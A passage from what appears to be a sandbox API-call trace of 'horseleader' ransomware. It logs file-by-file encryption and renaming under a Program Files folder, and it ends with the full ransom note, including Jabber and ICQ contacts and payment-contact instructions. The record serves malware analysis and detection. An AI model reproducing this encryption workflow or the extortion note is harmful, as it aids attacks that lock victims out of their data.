lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.105] GetProcessHeap () returned 0x780000 [0248.105] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.105] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*") returned 68 [0248.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.106] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\.") returned 68 [0248.106] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.106] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.106] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\..") returned 69 [0248.106] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.106] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x68b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.106] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") 
returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0248.106] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.106] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.106] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.106] lstrlenW (lpString=".testttjffg") returned 11 [0248.106] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.107] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.107] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.108] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0248.108] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.108] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1675) returned 1 [0248.108] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x68b, lpOverlapped=0x0) returned 1 [0248.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff975, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x68b, lpOverlapped=0x0) returned 1 [0248.111] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.111] CloseHandle (hObject=0x1a4) returned 1 [0248.111] GetProcessHeap () returned 0x780000 [0248.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.111] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.horseleader") returned 90 [0248.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.horseleader")) returned 1 [0248.112] GetProcessHeap () returned 0x780000 [0248.112] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.112] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e493a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5ac7a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2e493a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbfed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STUDIO.ELM", cAlternateFileName="")) returned 1 [0248.112] lstrcmpiW (lpString1="STUDIO.ELM", lpString2="Windows") returned -1 [0248.112] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0248.112] StrStrIW (lpFirst="STUDIO.ELM", lpSrch=".horseleader") returned 0x0 [0248.112] lstrcmpW (lpString1="STUDIO.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.113] lstrcmpW (lpString1="STUDIO.ELM", lpString2="_uninstalling_.png") returned 1 [0248.113] lstrlenW (lpString=".testttjffg") returned 11 [0248.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM", lpSrch=".testttjffg") returned 0x0 [0248.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0248.115] StrStrW (lpFirst="STUDIO.ELM", lpSrch=".txt") returned 0x0 [0248.115] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49133) returned 1 [0248.116] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.118] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.118] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.119] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.119] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.120] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fed, lpOverlapped=0x0) returned 1 [0248.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe013, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, 
nNumberOfBytesToWrite=0x1fed, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fed, lpOverlapped=0x0) returned 1 [0248.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.121] CloseHandle (hObject=0x1a4) returned 1 [0248.121] GetProcessHeap () returned 0x780000 [0248.121] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.121] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM.horseleader") returned 89 [0248.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm.horseleader")) returned 1 [0248.124] GetProcessHeap () returned 0x780000 [0248.124] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.124] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, 
ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STUDIO.INF", cAlternateFileName="")) returned 1 [0248.124] lstrcmpiW (lpString1="STUDIO.INF", lpString2="Windows") returned -1 [0248.124] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0248.124] StrStrIW (lpFirst="STUDIO.INF", lpSrch=".horseleader") returned 0x0 [0248.124] lstrcmpW (lpString1="STUDIO.INF", lpString2="#Decrypt#.txt") returned 1 [0248.124] lstrcmpW (lpString1="STUDIO.INF", lpString2="_uninstalling_.png") returned 1 [0248.124] lstrlenW (lpString=".testttjffg") returned 11 [0248.125] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF", lpSrch=".testttjffg") returned 0x0 [0248.125] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.125] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0248.129] StrStrW (lpFirst="STUDIO.INF", lpSrch=".txt") returned 0x0 [0248.129] 
GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=578) returned 1 [0248.129] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x242, lpOverlapped=0x0) returned 1 [0248.131] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdbe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x242, lpOverlapped=0x0) returned 1 [0248.131] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.131] CloseHandle (hObject=0x1a4) returned 1 [0248.131] GetProcessHeap () returned 0x780000 [0248.131] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.132] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF.horseleader") returned 89 [0248.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf.horseleader")) returned 1 [0248.133] GetProcessHeap () returned 0x780000 [0248.133] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.133] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.133] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.133] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0248.133] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.134] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.134] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.134] lstrlenW (lpString=".testttjffg") returned 11 [0248.134] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.134] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.134] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.134] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0248.135] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.135] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18380) returned 1 [0248.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x47cc, lpOverlapped=0x0) returned 1 [0248.160] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb834, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x47cc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x47cc, lpOverlapped=0x0) returned 1 [0248.161] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.161] CloseHandle (hObject=0x1a4) returned 1 
[0248.161] GetProcessHeap () returned 0x780000 [0248.161] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.161] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.horseleader") returned 91 [0248.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.horseleader")) returned 1 [0248.162] GetProcessHeap () returned 0x780000 [0248.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.163] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.163] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.163] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\#Decrypt#.txt") returned 80 [0248.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.163] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.164] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.165] lstrlenA (lpString="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") returned 1368 [0248.165] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.165] CloseHandle (hObject=0x158) returned 1 [0248.165] GetProcessHeap () returned 0x780000 [0248.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 